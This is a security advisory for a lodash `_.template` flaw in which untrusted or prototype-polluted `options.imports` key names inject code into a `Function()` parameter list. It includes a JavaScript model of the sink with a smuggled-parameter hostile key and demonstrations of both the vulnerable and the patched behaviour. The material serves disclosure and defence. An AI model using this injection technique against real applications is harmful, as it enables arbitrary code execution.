CVE-2026-4800: lodash vulnerable to Code Injection via `_.template` imports key names
Impact
The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the `variable` option in `_.template` but did not apply the same validation to `options.imports` key names. Both paths flow into the same `Function()` constructor sink: the import key names become the parameter list of the generated function.
When an application passes untrusted input as `options.imports` key names, an attacker can inject default-parameter expressions into that parameter list. Because the generated `Function()` is invoked immediately to produce the template function, the injected expression executes at template compilation time, that is, when `_.template` is called, before the template is ever rendered.
Additionally, `_.template` uses `assignInWith` to merge imports, which enumerates inherited properties via `for..in`. If `Object.prototype` has been polluted by any other vector, the polluted keys are copied into the imports object and passed to `Function()`, so the injection does not require the application to pass untrusted keys itself.
Patches
Users should upgrade to version 4.18.0.
The fix applies two changes:
1. Validate `importsKeys` against the existing `reForbiddenIdentifierChars` regex (the same check already used for the `variable` option).
2. Replace `assignInWith` with `assignWith` when merging imports, so only own properties are enumerated.
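The following is an added, self-contained model of the sink and of both fixes; it is not lodash's own code. `compileTemplate`, `collectImports` and the option names are assumptions for this demonstration, but they mirror the shape described above: the import key names are handed to `Function()` as its parameter list, the resulting function is applied immediately with the import values, and the character class is the one the advisory names for the `variable` option. The hostile key uses a comma to smuggle in a second parameter whose default initializer runs when the outer function is applied, which is exactly at compile time.

```javascript
// Added example, not lodash's code. Reduced model of the _.template sink.
// Character class the advisory names as already applied to `options.variable`.
const reForbiddenIdentifierChars = /[()=,{}\[\]\/\s]/;

// Collect import names and values. `inheritedToo` models assignInWith
// (for..in also walks the prototype chain); false models assignWith (own keys).
function collectImports(imports, inheritedToo) {
  const keys = [];
  if (inheritedToo) {
    for (const k in imports) keys.push(k);
  } else {
    keys.push(...Object.keys(imports));
  }
  return { keys, values: keys.map((k) => imports[k]) };
}

// validateKeys / inheritedToo are hypothetical switches so the vulnerable and
// fixed behaviours can be compared in one function.
function compileTemplate(source, imports, { validateKeys = false, inheritedToo = true } = {}) {
  const { keys, values } = collectImports(imports, inheritedToo);
  if (validateKeys) {
    for (const k of keys) {
      if (reForbiddenIdentifierChars.test(k)) {
        throw new Error('Invalid import name: ' + JSON.stringify(k));
      }
    }
  }
  // The sink: `keys` is stringified into a parameter list, and the outer
  // function is invoked right away, so default initializers run here.
  const body = 'return function (data) { return ' + source + '; };';
  return Function(keys, body).apply(undefined, values);
}

// Constructed template source; `greet` is an import, `data` is render input.
const source = 'greet(data.name)';

// Constructed hostile key: `a` absorbs the single supplied value, `b` gets
// none, so its default expression executes during compilation.
const hostileKey = 'a, b = (globalThis.__templateInjected = "ran at compile time")';

// Developer-controlled import name passes the identifier check.
function renderBenign() {
  const tpl = compileTemplate(source, { greet: (s) => 'Hello ' + s },
    { validateKeys: true, inheritedToo: false });
  return tpl({ name: 'Ada' });
}

// Untrusted key against the unpatched merge + no validation.
function attackUnpatched() {
  delete globalThis.__templateInjected;
  compileTemplate(source, { [hostileKey]: 1 });
  return globalThis.__templateInjected;
}

// Same key against the fixed behaviour: rejected before reaching Function().
function attackPatched() {
  delete globalThis.__templateInjected;
  try {
    compileTemplate(source, { [hostileKey]: 1 }, { validateKeys: true, inheritedToo: false });
  } catch (e) {
    return globalThis.__templateInjected === undefined ? 'rejected' : 'rejected but ran';
  }
  return 'not rejected';
}

// Prototype-pollution path: the key never appears in the app's own imports
// object; it is inherited. for..in copies it, Object.keys does not.
function pollutionDemo(inheritedToo) {
  delete globalThis.__templateInjected;
  Object.prototype[hostileKey] = 1; // stands in for pollution from another vector
  try {
    compileTemplate(source, {}, { inheritedToo });
  } finally {
    delete Object.prototype[hostileKey];
  }
  return globalThis.__templateInjected;
}
```

`attackUnpatched()` returns the string planted by the default initializer without any template ever being rendered, which is the compile-time execution the advisory describes; `pollutionDemo(true)` shows the same payload arriving purely through `Object.prototype`, and `pollutionDemo(false)` shows that enumerating own keys only, as `assignWith` does, closes that path.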
Workarounds
Do not pass untrusted input as key names in `options.imports`. Only use developer-controlled, static key names. Note that this does not address the prototype-pollution path, which requires the upgrade.
Frequently Asked Questions
What is the severity of CVE-2026-4800?
CVE-2026-4800 is rated as a high severity vulnerability due to its potential for code injection.
How can I fix CVE-2026-4800?
To fix CVE-2026-4800, update lodash to version 4.18.0 or later, where `importsKeys` are validated and imports are merged with `assignWith`.
What impact does CVE-2026-4800 have on my application?
CVE-2026-4800 allows an attacker who controls `options.imports` key names, or who has polluted `Object.prototype` through some other vector, to execute arbitrary code in the context of the application when it calls `_.template`.
Which versions of lodash are affected by CVE-2026-4800?
Lodash versions before 4.18.0 are affected by CVE-2026-4800.
Is there a workaround for CVE-2026-4800?
The workaround is to never pass untrusted input as key names in `options.imports` and to use only developer-controlled, static key names. This does not cover the `Object.prototype` pollution path, so upgrading to 4.18.0 or later is the recommended fix.